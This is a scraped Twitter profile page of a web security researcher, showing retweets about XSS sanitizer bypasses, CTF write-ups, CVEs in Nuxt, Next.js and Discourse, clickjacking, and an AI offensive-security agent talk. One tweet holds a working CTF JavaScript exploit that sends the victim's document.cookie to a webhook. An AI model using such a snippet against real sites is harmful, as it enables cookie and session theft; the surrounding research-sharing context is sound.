huli (@aszx87410) 's Twitter Profile
huli

@aszx87410

Taiwan / Front-end Engineer <=> Security Researcher. Interested in web. CTF player at @Water_Paddler

ID: 4731524647

linkhttps://blog.huli.tw/en/ calendar_today09-01-2016 03:51:10

2,2K Tweet

4,4K Followers

414 Following

Masato Kinugawa (@kinugawamasato) 's Twitter Profile Photo

Here is a bypass fixed in DOMPurify 3.1.7. It works only if special settings are used. Notice why the comment is closed with "->". masatokinugawa.github.io/xss/dompurify_…

Here is a bypass fixed in DOMPurify 3.1.7.
It works only if special settings are used. Notice why the comment is closed with "->".
masatokinugawa.github.io/xss/dompurify_…
Kévin GERVOT (Mizu) (@kevin_mizu) 's Twitter Profile Photo

My HeroCTF #web challenges write-ups are now available! :D mizu.re/post/heroctf-v… Here's a short list of the topics covered 👇 - Express res.download - Chromium cache partitioning - Service Worker hijacking through the Cache API - Webpack DOM clobbering 1/2

icesfont (@icesfont2) 's Twitter Profile Photo

x = open("/"); setTimeout(() => { x.history.pushState(1,1,"/cookie"); setTimeout(() => { x.location = "javascript:'zzz'"; setTimeout(() => { location = `webhook?${encodeURIComponent(x.document.cookie)}`; }, 500); }, 500); }, 500); (this wasn't intended)

Kévin GERVOT (Mizu) (@kevin_mizu) 's Twitter Profile Photo

For this challenge, it was necessary to abuse a discrepancy between the DOM and the rendered page in Firefox's cache handling 💽 👉 bugzilla.mozilla.org/show_bug.cgi?i… This allows to shift iframe rendering from one to another leading to a sandbox bypass 🔥 👉 mizu.re/post/an-18-yea…

OtterSec (@osec_io) 's Twitter Profile Photo

NEW: A few months ago, we uncovered an authentication bypass in Web3Auth that could have led to full account takeover. In this deep dive, we break down how we found the issue and expose other authentication misconfigurations lurking in Web3. osec.io/blog/2025-07-0…

zhero; (@zhero___) 's Twitter Profile Photo

while waiting for the big article to come (soon), I share with you a small article concerning a small research which led to a simple CP-DoS on Nuxt Nuxt, show me your payload - a basic CP DoS resulting in CVE-2025-27415, good reading zhero-web-sec.github.io/research-and-t…

while waiting for the big article to come (soon), I share with you a small article concerning a small research which led to a simple CP-DoS on <a href="/nuxt_js/">Nuxt</a> 

Nuxt, show me your payload - a basic CP DoS 

resulting in CVE-2025-27415, good reading

zhero-web-sec.github.io/research-and-t…
Harsh Jaiswal (@rootxharsh) 's Twitter Profile Photo

New Blogpost - We identified a vulnerability in Discourse where a misconfiguration in Rails send_file + Nginx's internal directive can expose database backups! projectdiscovery.io/blog/discourse… This issue isn't limited to Discourse. It can affect other Rails + Nginx apps with similar

New Blogpost - We identified a vulnerability in Discourse where a misconfiguration in Rails send_file + Nginx's internal directive can expose database backups!

projectdiscovery.io/blog/discourse…

This issue isn't limited to Discourse. It can affect other Rails + Nginx apps with similar
もうダニ by 左京区在中 (@tyage) 's Twitter Profile Photo

In addition to this amazing discovery, there was another middleware bypass with the `__nextLocale` URL query that was fixed in 2024. I wrote a short article about this vuln CVE-2024-51479. gmo-cybersecurity.com/blog/another-n…

slonser (@slonser_) 's Twitter Profile Photo

Today I used a technique that’s probably not widely known in the community. In what cases could code like this lead to a vulnerability? ->

Today I used a technique that’s probably not widely known in the community.
In what cases could code like this lead to a vulnerability? -&gt;
Jorian (@j0r1an) 's Twitter Profile Photo

Double-Clickjacking, or "press buttons on other sites without preconditions". After seeing and experimenting with this technique for a while, I cooked up a variation that combines many small tricks and ends up being quite convincing. Here's a flexible PoC: jorianwoltjer.com/blog/p/hacking…

terjanq (@terjanq) 's Twitter Profile Photo

For this year Google CTF I created yet another Postviewer challenge called Postviewer v5². The challenge featured a seemingly impossible race-condition. Client-side race-conditions are an under-researched problem and could yield amazing real world bugs! gist.github.com/terjanq/e66c28…

Kévin GERVOT (Mizu) (@kevin_mizu) 's Twitter Profile Photo

I'm happy to release a script gadgets wiki inspired by the work of Sebastian Lekies, koto, and Eduardo Vela in their Black Hat USA 2017 talk! 🔥 The goal is to provide quick access to gadgets that help bypass HTML sanitizers and CSPs 👇 gmsgadget.com 1/4

I'm happy to release a script gadgets wiki inspired by the work of <a href="/slekies/">Sebastian Lekies</a>, <a href="/kkotowicz/">koto</a>, and <a href="/sirdarckcat/">Eduardo Vela</a> in their Black Hat USA 2017 talk! 🔥

The goal is to provide quick access to gadgets that help bypass HTML sanitizers and CSPs 👇

gmsgadget.com

1/4
sudi (@sudhanshur705) 's Twitter Profile Photo

Last year I found a XSS bug in Google IDX here's a detail writeup about it. Hope you will enjoy it's kinda lengthy :p Shoutouts to Matan Berson for finding the original bug in Gitlab and Sreeram KL Sivanesh Ashok for the required chains to complete the exploit. sudistark.github.io/2025/07/02/idx…

Leandro Barragan (@lean0x2f) 's Twitter Profile Photo

"AI Agents for Offsec with Zero False Positives" by Brendan Dolan-Gavitt, a journey on how we managed to get 0 FPs with XBOW. You can find the slides for his BH talk here: cdn.prod.website-files.com/686c11d5bee015…

"AI Agents for Offsec with Zero False Positives" by <a href="/moyix/">Brendan Dolan-Gavitt</a>, a journey on how we managed to get 0 FPs with XBOW. You can find the slides for his BH talk here: cdn.prod.website-files.com/686c11d5bee015…